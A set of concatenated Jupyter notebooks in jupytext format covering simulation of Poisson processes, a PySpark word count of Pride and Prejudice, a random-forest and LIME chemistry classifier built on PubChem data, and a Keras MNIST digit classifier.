Data = np.random.rand(nbins,K).T < RateVector
spiketimes_bernoulli = []
for k in range(K):
spiketimes_bernoulli.append(np.nonzero(Data[k,:])[0]/nbins*T)
# +
# %%time
# Generate using exponential RV
spiketimes = []
for k in range(K):
sample = np.random.exponential(1/L,50) ## NOTE - 50 might not be enough!!
assert(np.sum(sample) > T)
if (sample[0] > T): # (We observed no events)
spiketimes.append([])
else:
        lastindex = np.argwhere(np.cumsum(sample) < T)[-1][0]
        spiketimes.append(np.cumsum(sample[:lastindex + 1]))  # include the last event before T
# +
# %%time
# Generate using Poisson and Uniform trick
Events = np.random.poisson(L,K)
spiketimes = []
for k in range(K):
spiketimes.append(np.sort(np.random.rand(Events[k])*T))
# -
# Show one example event
plt.stem(spiketimes[0],np.ones(len(spiketimes[0])), use_line_collection=True)
plt.gca().set_xlim(0,T)
# +
# Show that our events have exponential ISIs
ISIs = []
for k in range(K):
if len(spiketimes[k]) == 0:
continue
ISIs.append(spiketimes[k][0])
ISIs.extend(np.diff(np.array(spiketimes[k])).tolist())
import seaborn as sns
sns.distplot(np.array(ISIs),100, kde=False);
# +
# Show something more interesting - that our events are equally likely across T
AllEventTimes = np.hstack(spiketimes)
nHistBins = 100
HistBins = np.linspace(0,T,nHistBins + 1)
BinDuration = T/nHistBins
vals, bin_edges = np.histogram(AllEventTimes,bins=HistBins)
EventRate = vals / K / BinDuration # Number of events observed in each bin / Number of Observations / BinDuration
plt.plot(HistBins,np.ones(HistBins.shape) * L, 'r', label='Expected Rate = 10 Hz')
plt.gca().set_ylabel('Observed rate in small bins (Hz)')
plt.gca().legend()
plt.bar(HistBins[:-1] + BinDuration/2, EventRate ,width=BinDuration)
# -
# # Generating samples from an **Inhomogeneous** Poisson process
#
# An inhomogeneous Poisson process is like a Poisson process, but the rate changes as a function of time, i.e., $\lambda(t)$. In any window, the count of events is still Poisson, but now it is distributed as $\text{Poisson}(\int_0^T \lambda(t) dt)$. The inter-event intervals are no longer Exponentially distributed. Generating simulated data for an inhomogeneous Poisson process is a bit more complicated, but not too much!
# ### Three methods:
# - Generate using a Bernoulli approximation with very small bins of time. *(Still works!)*
# - Generate using a homogeneous Poisson process and *deletion*
# - Generate ISIs from an exponential RV and apply the time rescaling theorem **not shown**
# Let's define our rate function to be a ramp
def rate(t):
return 10*t
# ### Inhomogeneous Poisson Process Method 1: Bernoulli approximation
# +
# %%time
# Generating using bernoulli approximation
nbins = 1000
DeltaT = T/nbins  # duration of each small bin
BinCenters = np.arange(0,T,DeltaT) + DeltaT/2
RateVector = rate(BinCenters) * DeltaT  # P(event in a bin) = rate x bin duration
Data = np.random.rand(nbins,K).T < RateVector
inh_spiketimes_bernoulli = []
for k in range(K):
inh_spiketimes_bernoulli.append(np.nonzero(Data[k,:])[0]/nbins*T)
# +
# Plot observed event rate in small bins
AllInhEventTimes = np.hstack(inh_spiketimes_bernoulli)
nHistBins = 100
HistBins = np.linspace(0,T,nHistBins + 1)
BinDuration = T/nHistBins
vals, bin_edges = np.histogram(AllInhEventTimes,bins=HistBins)
EventRate = vals / K / BinDuration # Number of events observed in each bin / Number of Observations / BinDuration
plt.plot(HistBins,rate(HistBins+BinDuration/2), 'r', label='Expected Rate = Ramp to 10 Hz')
plt.gca().set_ylabel('Observed rate in small bins (Hz)')
plt.gca().legend()
plt.bar(HistBins[:-1] + BinDuration/2, EventRate ,width=BinDuration)
# -
# ### Inhomogeneous Poisson Process Method 2: Deletion!
#
# This technique relies on the fact that if we sample from a *homogeneous* Poisson process (with rate $\lambda_{max}$), we can go through and randomly delete spikes, and the result (if we choose the right probabilities) will still be an inhomogeneous Poisson process. The key is that a spike observed at time $t_k$ is *kept* with probability $\lambda(t_k) / \lambda_{max}$, i.e., deleted with probability $P_{delete} = 1 - \lambda(t_k) / \lambda_{max}$.
# +
# %%time
# First generate a homogeneous Poisson process with a rate at least as big as the maximum
# Inhomogeneous rate (Generate using Poisson and Uniform trick)
MaximumRate = 11 # must be an upper bound on rate(t); here max rate(t) = 10
Events = np.random.poisson(MaximumRate,K)
spiketimes = []
for k in range(K):
spiketimes.append(np.sort(np.random.rand(Events[k])*T))
inh_spiketimes_deletion = []
# Then, go through each spike and potentially delete it!!
for k in range(K):
RateAtSpikeTime = rate(spiketimes[k])
DeletionRand = np.random.rand(*RateAtSpikeTime.shape)
inh_spiketimes_deletion.append(
np.delete(spiketimes[k], np.argwhere(DeletionRand > RateAtSpikeTime/MaximumRate)) )
# +
# Plot observed event rate in small bins
AllInhEventTimes = np.hstack(inh_spiketimes_deletion)
nHistBins = 100
HistBins = np.linspace(0,T,nHistBins + 1)
BinDuration = T/nHistBins
vals, bin_edges = np.histogram(AllInhEventTimes,bins=HistBins)
EventRate = vals / K / BinDuration # Number of events observed in each bin / Number of Observations / BinDuration
plt.plot(HistBins,rate(HistBins+BinDuration/2), 'r', label='Expected Rate = Ramp to 10 Hz')
plt.gca().set_ylabel('Observed rate in small bins (Hz)')
plt.gca().legend()
plt.bar(HistBins[:-1] + BinDuration/2, EventRate ,width=BinDuration)
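# ### Inhomogeneous Poisson Process Method 3: Time rescaling (sketch)
#
# A minimal sketch of the third method listed above, for the ramp rate used here. For $\lambda(t) = 10t$ on $[0, 1]$, the cumulative intensity is $\Lambda(t) = 5t^2$ with inverse $\Lambda^{-1}(s) = \sqrt{s/5}$; unit-rate homogeneous arrival times mapped through $\Lambda^{-1}$ become arrivals of the inhomogeneous process. (This sketch uses NumPy's `default_rng`, an interface choice not used elsewhere in this notebook.)

```python
import numpy as np

rng = np.random.default_rng(1)
Lambda_T = 5.0  # Lambda(T) = expected number of events per trial

def sample_inhomogeneous(rng):
    # Unit-rate homogeneous arrivals up to Lambda(T)...
    arrivals = np.cumsum(rng.exponential(1.0, size=50))
    arrivals = arrivals[arrivals < Lambda_T]
    # ...mapped through Lambda_inv become arrivals of the inhomogeneous process.
    return np.sqrt(arrivals / 5.0)

counts = [len(sample_inhomogeneous(rng)) for _ in range(20000)]
print(np.mean(counts))  # close to Lambda(T) = 5
```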
Generating Poisson Random Variables.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python2
# ---
# <h1 align="center"> Word Count of Pride and Prejudice using PySpark </h1>
# +
import re, string
text_file = sc.textFile('Data/Pride_and_Prejudice.txt')
# -
# first 5 elements of the RDD
text_file.take(5)
type(u'lama')
string.punctuation
punc = '!"#$%&\'()*+,./:;<=>?@[\\]^_`{|}~'
def uni_to_clean_str(x):
converted = x.encode('utf-8')
lowercased_str = converted.lower()
# for more difficult cases use re.split(' A|B')
lowercased_str = lowercased_str.replace('--',' ')
    clean_str = lowercased_str.translate(None, punc)  # strip punctuation (Python 2 str.translate)
return clean_str
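# Note that this notebook targets Python 2 (`str.translate(None, punc)`). For reference, a Python 3 equivalent of the same cleaning step (the sample sentence is an illustrative assumption):

```python
punc = '!"#$%&\'()*+,./:;<=>?@[\\]^_`{|}~'  # same punctuation set as above; '-' is kept

def clean_str_py3(x):
    """Python 3 equivalent of uni_to_clean_str: lowercase, break '--', strip punctuation."""
    lowered = x.lower().replace('--', ' ')
    return lowered.translate(str.maketrans('', '', punc))

print(clean_str_py3('It is a truth universally acknowledged--that...'))
# 'it is a truth universally acknowledged that'
```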
one_RDD = text_file.flatMap(lambda x: uni_to_clean_str(x).split())
one_RDD = one_RDD.map(lambda x: (x,1))
one_RDD = one_RDD.reduceByKey(lambda x,y: x + y)
one_RDD.take(15)
one_RDD = text_file.map(lambda x: uni_to_clean_str(x))
one_RDD.take(5)
one_RDD = text_file.map(lambda x: uni_to_clean_str(x).split())
one_RDD.take(5)
one_RDD = text_file.flatMap(lambda x: uni_to_clean_str(x).split())
one_RDD.take(5)
one_RDD = text_file.flatMap(lambda x: uni_to_clean_str(x).split())
one_RDD = one_RDD.map(lambda x: (x,1))
one_RDD.take(5)
one_RDD = text_file.flatMap(lambda x: uni_to_clean_str(x).split())
one_RDD = one_RDD.map(lambda x: (x,1))
one_RDD = one_RDD.reduceByKey(lambda x,y: x + y)
one_RDD.take(15)
one_RDD = text_file.flatMap(lambda x: uni_to_clean_str(x).split())
one_RDD = one_RDD.map(lambda x: (x,1))
one_RDD = one_RDD.reduceByKey(lambda x,y: x + y)
one_RDD.take(5)
one_RDD = one_RDD.map(lambda x:(x[1],x[0]))
one_RDD.take(5)
one_RDD.sortByKey(False).take(15)
PySpark_Basics/PySpark_Part1_Word_Count_Removing_Punctuation_Pride_Prejudice.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# ## Import Libraries
# +
# Import libraries of interest.
# Numerical libraries
import sklearn #this is the main machine learning library
import sklearn.ensemble, sklearn.metrics, sklearn.preprocessing
import sklearn.cross_validation  # submodules used below must be imported explicitly
from sklearn.decomposition import PCA
import numpy as np #this is the numeric library
import scipy.stats as stats
#OS libraries
import urllib #this allows us to access remote files
import urllib2
import os
from collections import OrderedDict, defaultdict
import imp
import sys
#BCML libraries
from bcml.Parser import read_training as rt
from bcml.Parser import build_training as bt
from bcml.PubChemUtils import pubchempy_utils as pcp
from bcml.Chemoinformatics import chemofeatures as cf
from bcml.Train import train_model as tm
from bcml.Parser import read_testing as rtest
from bcml.Parser import build_testing as btest
# Visualization libraries
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
from IPython.display import Image
# Explanability libraries
import lime
import lime.lime_tabular
# Chemistry libraries
indigo = imp.load_source('indigo', 'indigo-python-1.2.3.r0-mac/indigo.py')
indigo_renderer = imp.load_source('indigo_renderer', 'indigo-python-1.2.3.r0-mac/indigo_renderer.py')
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit.Chem import Draw
from IPython.display import display, Image
# -
# ## Train the model
class Train:
def __init__(self):
pass
def load(self, filename, identifier):
train = rt.Read(filename, identifier, id_name="PubChem")
# Load SDFs from NCBI
training_data = pcp.Collect(train.compounds, sdf=True, chunks=20, id_name='PubChem', predictors=train.predictors, proxy=None)
training_data = cf.Update(training_data, remove_static=False)
# Run PaDEL-Descriptor to extract 6150 substructural features
training_data.update(padel=True)
ids = [id for id, compound in dict.iteritems(OrderedDict(sorted(training_data.compound.items(), key=lambda t: t[0])))]
# Create machine learning model using a Random Forest Classifier
predictors = []
names = []
compounds = []
training_compounds = OrderedDict(sorted(training_data.compound.items(), key=lambda t: t[0]))
# Preprocess data
for identifier, compound in dict.iteritems(training_compounds):
predictors.append(training_compounds[identifier]['predictor'])
compounds.append(training_compounds[identifier])
names.append(identifier)
predictor_values = np.array(predictors, '|S4').astype(np.float)
#Generate predictor values: y
predict = np.zeros(len(predictor_values), dtype=int)
for i, value in np.ndenumerate(predictor_values):
if value >= np.median(predictor_values):
predict[i] = 1
rows = len(predict)
# Load the names of the features
feature_names = []
for compound in compounds:
feature_names = sorted(compound['padelhash'].keys())
for c in feature_names:
if c == 'Name':
feature_names.remove(c)
columns = len(feature_names)
data_table = np.zeros((rows, columns), dtype=np.float64)
# Load the training values: X
for index, value in np.ndenumerate(data_table):
compound = compounds[index[0]]['padelhash']
feature = list(feature_names)[index[1]]
data_table[index] = float(compound[feature])
self.data_table = data_table
self.feature_names = feature_names
self.compounds = compounds
self.predict = predict
self.predictor_values = predictor_values
self.training_data = training_data
self.training_compounds = training_compounds
self.names = names
def reduce_features(self):
feature_list = np.genfromtxt("feature_list.txt", dtype="str", delimiter="\t", comments="%")
feature_ids = [a for a, b in feature_list]
feature_patterns = [b for a, b in feature_list]
data_table = self.data_table
names = self.names
# Remove invariable features
reduced_X = data_table[:,np.where(data_table.var(axis=0)!=0)[0]]
reduced_feature_ids = [feature_ids[i] for i in np.where(data_table.var(axis=0)!=0)[0]]
reduced_feature_patterns = [feature_patterns[i] for i in np.where(data_table.var(axis=0)!=0)[0]]
rows = len(names)
columns = len(reduced_feature_ids)
reduced_data_table = np.zeros((rows, columns), dtype=np.float64)
# Load the training values: X
for index, value in np.ndenumerate(reduced_data_table):
compound = self.compounds[index[0]]['padelhash']
feature = list(reduced_feature_ids)[index[1]]
reduced_data_table[index] = float(compound[feature])
self.reduced_data_table = reduced_data_table
self.reduced_feature_ids = reduced_feature_ids
self.reduced_feature_patterns = reduced_feature_patterns
def learn(self):
self.clf = sklearn.ensemble.RandomForestClassifier(n_estimators=512, oob_score=True, n_jobs=-1, class_weight="balanced")
self.clf.fit(X=self.reduced_data_table, y=self.predict)
# ## Evaluate classifier
# +
class CrossValidate:
def __init__(self, model):
self.model = model
self.clf = sklearn.ensemble.RandomForestClassifier(n_estimators=512, oob_score=True, n_jobs=-1, class_weight="balanced")
def cross_validation(self):
self.clf.fit(X=self.model.reduced_data_table, y=self.model.predict)
def _run_cv(cv, clf, y, X):
ys = []
for train_idx, valid_idx in cv:
clf.fit(X=X[train_idx], y=y[train_idx])
cur_pred = clf.predict(X[valid_idx])
ys.append((y[valid_idx], cur_pred))
acc = np.fromiter(map(lambda tp: sklearn.metrics.accuracy_score(tp[0], tp[1]), ys), np.float)
prec = np.fromiter(map(lambda tp: sklearn.metrics.precision_score(tp[0], tp[1]), ys), np.float)
recall = np.fromiter(map(lambda tp: sklearn.metrics.recall_score(tp[0], tp[1]), ys), np.float)
roc = np.fromiter(map(lambda tp: sklearn.metrics.roc_auc_score(tp[0], tp[1]), ys), np.float)
print_line = ("\tAccuracy: %0.4f +/- %0.4f" % (np.mean(acc), np.std(acc) * 2))
print(print_line)
print_line = ("\tPrecision: %0.4f +/- %0.4f" % (np.mean(prec), np.std(prec) * 2))
print(print_line)
print_line = ("\tRecall: %0.4f +/- %0.4f" % (np.mean(recall), np.std(recall) * 2))
print(print_line)
print_line = ("\tReceiver Operator, AUC: %0.4f +/- %0.4f" % (np.mean(roc), np.std(roc) * 2))
print(print_line)
        # 50% hold-out is very conservative: it uses half the data for training and half for testing.
        # Likely a closer accuracy match to a novel dataset
cv = sklearn.cross_validation.StratifiedShuffleSplit(self.model.predict, n_iter=100, test_size=0.5)
print("For 100 resamples at 50%")
_run_cv(cv, self.clf, self.model.predict, self.model.reduced_data_table)
        # 10-fold cross-validation is less conservative: it uses 90% of the data for training and 10% for testing.
        # Likely closer accuracy between model and training data
cv = sklearn.cross_validation.StratifiedKFold(self.model.predict, n_folds=10)
print("For 10-fold cross validation")
_run_cv(cv, self.clf, self.model.predict, self.model.reduced_data_table)
def visualize(self, filename):
plt.clf()
sns.set_style("darkgrid")
# Initialize the figure
plt.plot([0, 1], [0, 1], 'k--')
plt.xlim([-0.01, 1.01])
plt.ylim([-0.01, 1.01])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Mean Receiver operating characteristic')
tprs = []
base_fpr = np.linspace(0, 1, 101)
# Run 10 instances of 10X cross_validation
for i in range(10):
X_train, X_test, y_train, y_test = sklearn.cross_validation.train_test_split(self.model.reduced_data_table, self.model.predict, test_size=0.1)
self.clf.fit(X_train, y_train)
y_pred = self.clf.predict_proba(X_test)[:, 1]
fpr, tpr, _ = sklearn.metrics.roc_curve(y_test, y_pred)
plt.plot(fpr, tpr, 'b', alpha=0.15)
tpr = np.interp(base_fpr, fpr, tpr)
tpr[0] = 0.0
tprs.append(tpr)
# Get average and std for cross_validation
tprs = np.array(tprs)
mean_tprs = tprs.mean(axis=0)
std = tprs.std(axis=0)
tprs_upper = np.minimum(mean_tprs + std, 1)
tprs_lower = mean_tprs - std
#Plot multiple ROCs
plt.plot(base_fpr, mean_tprs, 'b')
plt.fill_between(base_fpr, tprs_lower, tprs_upper, color='grey', alpha=0.3)
plt.axes().set_aspect('equal')
plt.savefig(filename)
Image(filename = filename)
# -
# ## Load testing data
class Testing:
def __init__(self):
pass
def load(self, filename):
testing_data = pcp.Collect(local=filename, sdf=True)
testing_data = cf.Update(testing_data, remove_static=False)
testing_data.update(padel=True)
testing_compounds = OrderedDict(sorted(testing_data.compound.items(), key=lambda t: t[0]))
compounds = []
for identifier, compound in dict.iteritems(testing_compounds):
compounds.append(testing_compounds[identifier])
#self.filename = filename
#testing = rtest.Read(filename, id_name="PubChem")
#testing_data = pcp.Collect(testing.compounds, sdf=True, chunks=20, id_name='PubChem', proxy=None)
#pubchem_id_dict = {}
#for compound in testing.compounds:
# pubchem_id_dict[compound['PubChem']] = compound['Name']
# testing_data = cf.Update(testing_data, remove_static=False)
# Run PaDEL-Descriptor to extract 6150 substructural features
#testing_data.update(padel=True)
feature_names = []
#testing_compounds = OrderedDict(sorted(testing_data.compound.items(), key=lambda t: t[0]))
#compounds = []
#for identifier, compound in dict.iteritems(testing_compounds):
# compounds.append(testing_compounds[identifier])
# Load the names of the features
feature_names = []
for compound in compounds:
feature_names = sorted(compound['padelhash'].keys())
for c in feature_names:
if c == 'Name':
feature_names.remove(c)
columns = len(feature_names)
rows = len(testing_data.compound)
test = np.zeros((rows, columns,), dtype=np.float64)
compounds = []
testing_names = []
testing_data.compound = OrderedDict(sorted(testing_data.compound.items(), key=lambda t: t[0]))
for id, compound in testing_data.compound.iteritems():
compounds.append(compound)
testing_names.append(id)
self.testing_data = testing_data
self.compounds = compounds
self.testing_names = testing_names
#self.pubchem_id_dict = pubchem_id_dict
rows = len(testing_names)
# Load the names of the features
feature_names = []
for compound in compounds:
feature_names = sorted(compound['padelhash'].keys())
for c in feature_names:
if c == 'Name':
feature_names.remove(c)
columns = len(feature_names)
testing_data_table = np.zeros((rows, columns), dtype=np.float64)
# Load the training values: X
for index, value in np.ndenumerate(testing_data_table):
compound = compounds[index[0]]['padelhash']
feature = list(feature_names)[index[1]]
testing_data_table[index] = float(compound[feature])
self.feature_names = feature_names
self.testing_data_table = testing_data_table
def reduce_features(self, train):
feature_list = np.genfromtxt("feature_list.txt", dtype="str", delimiter="\t", comments="%")
feature_ids = [a for a, b in feature_list]
feature_patterns = [b for a, b in feature_list]
data_table = self.testing_data_table
names = self.testing_names
# Remove invariable features
reduced_feature_ids = train.reduced_feature_ids
reduced_feature_patterns = train.reduced_feature_patterns
rows = len(names)
columns = len(reduced_feature_ids)
reduced_data_table = np.zeros((rows, columns), dtype=np.float64)
# Load the training values: X
for index, value in np.ndenumerate(reduced_data_table):
compound = self.compounds[index[0]]['padelhash']
feature = list(reduced_feature_ids)[index[1]]
reduced_data_table[index] = float(compound[feature])
self.reduced_data_table = reduced_data_table
self.reduced_feature_ids = reduced_feature_ids
self.reduced_feature_patterns = reduced_feature_patterns
def learn(self, train):
train.clf.fit(X=train.data_table, y=train.predict)
print(train.clf.predict_proba(self.testing_data_table))
print(self.testing_names)
# ## Evaluate the similarity of training and testing datasets
class VisualizeTesting():
def __init__(self, train, testing):
self.train = train
self.testing = testing
def pca(self):
self.pca = PCA()
self.pca.fit(self.train.data_table)
self.pc_train = self.pca.transform(self.train.data_table)
self.pc_testing = self.pca.transform(self.testing.testing_data_table)
def viz_explained(self, filename):
plt.clf()
summed_variance = np.cumsum(self.pca.explained_variance_ratio_)
plt.axhline(summed_variance[4], color="mediumpurple")
barlist = plt.bar(range(25), summed_variance[:25], color="steelblue")
thresh = np.where(summed_variance[:25] <= summed_variance[4])[0]
for t in thresh:
barlist[t].set_color('mediumpurple')
plt.axhline(0.9, color="darkred")
thresh = np.where(summed_variance[:25] >= 0.9)[0]
for t in thresh:
barlist[t].set_color('darkred')
plt.title("Variance Explained by Each PC")
plt.savefig(filename)
Image(filename = filename)
def viz_xx(self, filename):
plt.clf()
pc = self.pc_train
pc_test = self.pc_testing
f, axarr = plt.subplots(4, 4, sharex='col', sharey='row')
axarr[0, 0].set_title("PC1")
axarr[0, 1].set_title("PC2")
axarr[0, 2].set_title("PC3")
axarr[0, 3].set_title("PC4")
axarr[0, 0].set_ylabel("PC2")
axarr[1, 0].set_ylabel("PC3")
axarr[2, 0].set_ylabel("PC4")
axarr[3, 0].set_ylabel("PC5")
axarr[0, 0].scatter(pc[:, 1], pc[:, 0])
axarr[0, 0].scatter(pc_test[:, 1], pc_test[:, 0], color="red")
axarr[1, 0].scatter(pc[:, 2], pc[:, 0])
axarr[1, 0].scatter(pc_test[:, 2], pc_test[:, 0], color="red")
axarr[2, 0].scatter(pc[:, 3], pc[:, 0])
axarr[2, 0].scatter(pc_test[:, 3], pc_test[:, 0], color="red")
axarr[3, 0].scatter(pc[:, 4], pc[:, 0])
axarr[3, 0].scatter(pc_test[:, 4], pc_test[:, 0], color="red")
axarr[0, 1].axis('off')
axarr[1, 1].scatter(pc[:, 2], pc[:, 1])
axarr[1, 1].scatter(pc_test[:, 2], pc_test[:, 1], color="red")
axarr[2, 1].scatter(pc[:, 3], pc[:, 1])
axarr[2, 1].scatter(pc_test[:, 3], pc_test[:, 1], color="red")
axarr[3, 1].scatter(pc[:, 4], pc[:, 1])
axarr[3, 1].scatter(pc_test[:, 4], pc_test[:, 1], color="red")
axarr[0, 2].axis('off')
axarr[1, 2].axis('off')
axarr[2, 2].scatter(pc[:, 3], pc[:, 2])
axarr[2, 2].scatter(pc_test[:, 3], pc_test[:, 2], color="red")
axarr[3, 2].scatter(pc[:, 4], pc[:, 2])
axarr[3, 2].scatter(pc_test[:, 4], pc_test[:, 2], color="red")
axarr[0, 3].axis('off')
axarr[1, 3].axis('off')
axarr[2, 3].axis('off')
axarr[3, 3].scatter(pc[:, 4], pc[:, 3])
axarr[3, 3].scatter(pc_test[:, 4], pc_test[:, 3], color="red")
plt.savefig(filename)
Image(filename = filename)
# ## Lime
class LIME:
def __init__(self, training, testing, identifier):
self.training = training
self.testing = testing
self.identifier = identifier
training.clf.fit(training.reduced_data_table, training.predict)
self.predict_fn = lambda x: training.clf.predict_proba(x).astype(float)
categorical_features = range(len(training.reduced_feature_patterns))
categorical_names = {}
for feature in categorical_features:
le = sklearn.preprocessing.LabelEncoder()
le.fit(training.reduced_data_table[:, feature])
categorical_names[feature] = le.classes_
explainer = lime.lime_tabular.LimeTabularExplainer(testing.reduced_data_table, verbose=True,
feature_names=training.reduced_feature_patterns,
class_names = [str('Low'+ identifier), str('High' + identifier)],
categorical_features=categorical_features,
categorical_names=categorical_names, kernel_width = 3)
self.explainer = explainer
def molecule(self, local=False):
import imp
indigo = imp.load_source('indigo', 'indigo-python-1.2.3.r0-mac/indigo.py')
        indigo_renderer = imp.load_source('indigo_renderer', 'indigo-python-1.2.3.r0-mac/indigo_renderer.py')
indigo = indigo.Indigo()
indigoRenderer = indigo_renderer.IndigoRenderer(indigo)
def getAtomsActivity (m, patterns):
matcher = indigo.substructureMatcher(m)
atom_values = defaultdict(float)
for pattern, value in patterns:
try:
query = indigo.loadQueryMolecule(pattern)
for match in matcher.iterateMatches(query):
for qatom in query.iterateAtoms():
atom = match.mapAtom(qatom)
atom_values[atom.index()] += value / query.countAtoms()
except:
pass
return atom_values
def addColorSGroups (m, atom_values):
min_value = min(atom_values.itervalues())
max_value = max(atom_values.itervalues())
centered_value = (min_value + max_value) / 2.
for atom_index, atom_value in atom_values.iteritems():
if atom_value < 0.:
color = "0, 0, %f" % abs(atom_value / centered_value)
elif atom_value > 0.:
color = "%f, 0, 0" % abs(atom_value / centered_value)
m.addDataSGroup([atom_index], [], "color", color)
return min_value, max_value
def assignColorGroups (m, patterns):
atom_values = getAtomsActivity(m, patterns)
min_value, max_value = addColorSGroups(m, atom_values)
return min_value, max_value
for count, (id, compound) in enumerate(self.testing.testing_data.compound.iteritems()):
id_name = id
print(count, id_name)
_base = 'pubchem.ncbi.nlm.nih.gov'
uri = '/rest/pug/compound/cid/' + str(id_name) + '/record/SDF'
uri = 'http://' + _base + uri
if not local:
response = urllib2.urlopen(uri)
value = response.read().strip().decode().strip('$$$$')
filename = "data/" + str(id_name) + ".sdf"
text_file = open(filename, "w")
text_file.write(value)
text_file.close()
row = count
#Collect explanations from LIME
exp = self.explainer.explain_instance(self.testing.reduced_data_table[row],
self.predict_fn,
num_features=len(self.training.reduced_feature_patterns),
top_labels=1, verbose=True, num_samples=5000)
#Load molecule
if local:
mol = indigo.iterateSDFile(local)
m = mol.at(count)
else:
mol = indigo.iterateSDFile(filename)
m = mol.at(0)
patterns = []
#Find the local explanation: exp.local_exp[1]
intercept = exp.intercept.keys()[0]
local_prob = exp.intercept.values()[0]
prob = exp.predict_proba[intercept]
for k, v in exp.local_exp.items():
for (num, val) in v:
print(str(id_name), exp.domain_mapper.exp_feature_names[num], val)
#Map the explanation to the feature, if it is present in the molecule move forward
if float(exp.domain_mapper.feature_values[num]) == 1.:
if abs(val) != 0.:
patterns.append((self.testing.reduced_feature_patterns[num], val))
#Draw molecules
indigo.setOption("render-atom-ids-visible", "false");
indigo.setOption("render-atom-color-property", "color")
indigo.setOption('render-coloring', False)
indigo.setOption('render-comment-font-size', 32)
indigo.setOption('render-bond-line-width', 2.0)
indigo.setOption("render-margins", 100, 1);
indigo.setOption('render-comment', id_name)
try:
assignColorGroups(m, patterns)
except:
pass
renderfile = "img/" + str(self.identifier) + str(id_name) + ".png"
indigoRenderer.renderToFile(m, renderfile)
def run_classifier(training_file, testing_file, roc_file, identifier, train=False, cv=True, visualize=True, lime=True, local=False, delim=""):
if not train:
train = Train()
train.load(training_file, identifier)
train.reduce_features()
train.learn()
if cv:
CV = CrossValidate(train)
CV.cross_validation()
if visualize:
CV.visualize(roc_file)
test = Testing()
test.load(testing_file)
test.reduce_features(train)
test.learn(train)
if visualize:
viz = VisualizeTesting(train, test)
viz.pca()
var_file = delim + "visualized_variance.png"
viz.viz_explained(var_file)
xx_file = delim + "visualized_xx.png"
viz.viz_xx(xx_file)
if lime:
lime = LIME(train, test, identifier)
lime.molecule(local)
return(train)
training = run_classifier('cetane.txt', "testing_data.txt", 'testing_data.png', 'Cetane', cv=False, train=False, visualize=True, lime=True, delim="testing")
BCML_FeatureCreature.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="ViGZ1Nf6qLZ9"
# # Classifying handwritten digits with deep networks
#
# Here we explore how changing the architecture of a neural network impacts the performance of the network.
#
# ## 1. Data preparation
# Before we can build any neural networks we need to import a few things from Keras and prepare our data. The following code extracts the MNIST dataset, provided by Keras, and flattens the 28x28 pixel images into a vector with length 784. Additionally, it modifies the labels from a numeric value 0-9 to categorical class labels.
# + colab={"base_uri": "https://localhost:8080/", "height": 69} id="LRYVKDbQqLaB" outputId="aa8fef47-2c40-49d1-f3c4-98205d823459"
import keras
from keras.datasets import mnist
from keras.layers import Dense
from keras.models import Sequential
from keras.layers import Layer
from matplotlib import pyplot as plt
from random import randint
# Preparing the dataset
# Setup train and test splits
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Keep a copy of the original 28x28 images before flattening, for the drawing code below
x_train_drawing = x_train.copy()
image_size = 784 # 28 x 28
x_train = x_train.reshape(x_train.shape[0], image_size)
x_test = x_test.reshape(x_test.shape[0], image_size)
# Convert class vectors to binary class matrices
num_classes = 10
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
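The label conversion above can be sanity-checked by hand: `to_categorical` maps each integer label to a one-hot vector. A minimal NumPy sketch of the same transformation (not the Keras implementation itself):

```python
import numpy as np

def one_hot(labels, num_classes):
    """Map integer labels to one-hot row vectors, like keras.utils.to_categorical."""
    out = np.zeros((len(labels), num_classes))
    out[np.arange(len(labels)), labels] = 1.0
    return out

# The label 3 becomes a 10-dimensional vector with a 1 in position 3.
print(one_hot([3], 10))
```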
# + [markdown] id="g6rqmYKZHInx"
# ## 2. A look at some random digits
#
# It's a good idea to get a sense of the dataset we're working with. Run this code multiple times to see new randomly selected digits from the training set.
# + colab={"base_uri": "https://localhost:8080/", "height": 350} id="XaR6ncOmHNNw" outputId="df3cde0e-6b20-4be7-a639-91f86c4b47c3"
for i in range(64):
    ax = plt.subplot(8, 8, i+1)
    ax.axis('off')
    # randint is inclusive on both ends, so the upper bound must be shape[0] - 1
    plt.imshow(x_train_drawing[randint(0, x_train.shape[0] - 1)], cmap='Greys')
# -
# ## 3. Visualizing weights in a single-layer network
model = Sequential()
out_layer = Dense(units=num_classes, activation='softmax', input_shape=(image_size,))
model.add(out_layer)
model.summary()
model.compile(optimizer="sgd", loss='categorical_crossentropy', metrics=['accuracy'])
history = model.fit(x_train, y_train, epochs=50, verbose=False, validation_data=(x_test, y_test))
history.history.keys()
loss, accuracy = model.evaluate(x_train, y_train, verbose=False)
print(f'Train loss: {loss:.3}')
print(f'Train accuracy: {accuracy:.3}')
loss, accuracy = model.evaluate(x_test, y_test, verbose=False)
print(f'Test loss: {loss:.3}')
print(f'Test accuracy: {accuracy:.3}')
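The softmax activation on the output layer is what turns the 10 raw scores into a probability distribution over digits. A minimal NumPy sketch of the function (a standard formulation, not Keras's internal code):

```python
import numpy as np

def softmax(scores):
    """Exponentiate and normalize so the outputs are positive and sum to 1."""
    exp = np.exp(scores - np.max(scores))  # subtract the max for numerical stability
    return exp / exp.sum()

scores = np.array([2.0, 1.0, 0.1])
probs = softmax(scores)
print(probs, probs.sum())  # the largest score gets the largest probability
```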
# +
import numpy as np
output_weights = out_layer.get_weights()
arr = np.array(output_weights[0])
w = np.transpose(arr)
weights_per_label_long = w.tolist()
w.shape
# -
model.compile(optimizer="sgd", loss='categorical_crossentropy', metrics=['accuracy'])
history = model.fit(x_train, y_train, batch_size=128, epochs=4, verbose=False, validation_data=(x_test, y_test))
# +
loss, accuracy = model.evaluate(x_train, y_train, verbose=False)
print(f'Train loss: {loss:.3}')
print(f'Train accuracy: {accuracy:.3}')
